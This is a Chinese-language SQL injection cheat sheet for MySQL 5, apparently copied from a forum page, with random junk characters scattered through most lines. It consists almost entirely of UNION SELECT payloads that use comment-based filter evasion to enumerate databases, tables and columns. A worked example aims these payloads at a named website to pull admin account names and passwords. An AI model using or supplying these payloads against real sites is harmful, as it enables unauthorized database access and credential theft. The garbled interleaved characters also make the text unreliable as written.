查库0 v8 p( w5 M- @) s
7 P2 [/ h* y& c- n1 r
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*) d3 C! v# }1 P4 `
5 a, X! A3 d. }9 x& p, h- ^3 M7 L
查表$ {9 c2 R, O8 x, h. T |9 [
* i9 N1 c3 c7 ~1 pid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
8 w7 D+ a* @9 w h) H1 V* ]
# y V. U, }# o0 s' Q1 S3 K查段
! Z# G1 m5 a/ K/ T7 p0 L
0 ^! \9 D3 N! o, Y4 ~id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1+ R- L4 C# G. E+ t* d/ H
+ t4 ~% G$ T) g$ n, c0 h4 m, J1 u q$ P5 h7 J! O* W4 C: ?
mysql5高级注入方法暴表
4 d% o; @$ U$ i8 I6 g& q% v( P/ i% }3 L$ a9 |) C
例子如下:
* @! a4 h: ]. [0 F' f' }* { @4 ~3 N
1.爆表5 \5 w) J. ^) s1 [; }7 q
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
' o1 A. k) T+ A% H; l1 v这样爆到第4个时出现了admin_user表。( J3 b- }' Z6 g) }' ?) O
: F# j9 I4 d( Z& j( W
2.暴字段. {* p1 E) Q1 g2 w: c( |
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
9 L* w1 y8 |& x/ v8 z' D
4 k! T9 y3 r* m! j [' v3 B) e
3.爆密码- b) r; e: s3 j9 j$ k( K
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* " E9 }9 o0 ^4 A7 v6 f' n
5 z8 Q6 t& N6 h$ l/ o# e$ V- X- A' w) V, M) ~7 A A3 g
|